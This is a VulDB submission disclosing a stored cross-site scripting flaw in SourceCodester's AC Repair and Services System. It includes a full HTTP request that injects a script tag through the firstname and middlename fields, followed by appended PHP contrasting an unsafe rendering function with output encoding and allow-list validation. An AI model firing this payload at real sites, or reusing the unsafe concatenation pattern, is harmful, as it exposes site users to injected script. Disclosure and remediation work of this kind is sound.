Submit #180834: SourceCodester AC Repair and Services System Users.php cross site scripting info

Title: SourceCodester AC Repair and Services System Users.php cross site scripting
Description: I discovered an XSS vulnerability in SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is in url/classes/Users.php?f=save.

POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690
Content-Length: 1077
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=user/manage_user
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="id"

1
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="firstname"

<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="middlename"

<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="lastname"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="username"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="password"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="type"

2
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------248310740335140400871461243690--

This is a storage-based XSS vulnerability where anyone who accesses url/php-acrss/admin/?page=user/list will receive pop-up windows, because the XSS code is directly concatenated into the source code. The repair method is to filter parameters such as username once, for characters such as <, >, etc.
Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submission: 11.07.2023 18:14 (3 years ago)
Moderation: 13.07.2023 11:49 (2 days later)
Status: Accepted
VulDB Entry: 234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename Cross Site Scripting]
Points: 20
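The description above reports that the firstname/middlename values saved through Users.php?f=save are later concatenated into the HTML of the user list unencoded, and proposes filtering characters such as < and >. The following is an added illustration of the defensive fix, not code from the AC Repair and Services System project: it contrasts the raw-concatenation pattern the report describes with output encoding via htmlspecialchars(), plus an allow-list check for the name fields on the save side. The function names (render_row_unsafe, render_row_safe, e, validate_name) and the sample record are constructed for this example.

```php
<?php
// Added example; it is not part of the AC Repair and Services System code base.
// Constructed sample record, shaped like the values stored by the f=save request
// in the report (firstname/middlename carry markup, the rest are plain text).
$user = [
    'firstname'  => '<ScRipt>alert(1)</ScRipt>',
    'middlename' => '<ScRipt>alert(1)</ScRipt>',
    'lastname'   => '123',
];

// Vulnerable pattern (hypothetical, mirrors what the report describes):
// stored values are concatenated straight into the markup of the user list,
// so any <script> element in the value becomes part of the page.
function render_row_unsafe(array $u): string
{
    return '<tr><td>' . $u['firstname'] . ' ' . $u['middlename']
         . ' ' . $u['lastname'] . '</td></tr>';
}

// Output-encoding helper: every untrusted value is HTML-encoded at the point
// where it is written into an HTML text or attribute context.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: same row, but each field passes through e() first, so
// "<" and ">" arrive in the browser as &lt; and &gt; and are displayed, not executed.
function render_row_safe(array $u): string
{
    return '<tr><td>' . e($u['firstname']) . ' ' . e($u['middlename'])
         . ' ' . e($u['lastname']) . '</td></tr>';
}

// Optional input-side control for the f=save handler: accept only characters
// that belong in a person's name and reject everything else. This is an
// allow-list rather than a blocklist of "<" and ">", because output encoding
// is still needed for every other context the value may reach (attributes,
// JavaScript, JSON), and a blocklist alone does not cover those.
function validate_name(string $s): bool
{
    return (bool) preg_match('/^[\p{L}\p{M} .\'-]{1,50}$/u', $s);
}

echo render_row_unsafe($user), PHP_EOL; // markup survives intact: the reported bug
echo render_row_safe($user), PHP_EOL;   // markup is encoded and rendered as text
var_dump(validate_name($user['firstname'])); // rejected by the allow-list
var_dump(validate_name('Jane'));             // accepted
```

The essential change is the output-encoding step in render_row_safe(): encoding has to happen wherever the stored value is emitted into HTML, and the validate_name() check on save is a second, independent layer rather than a substitute for it.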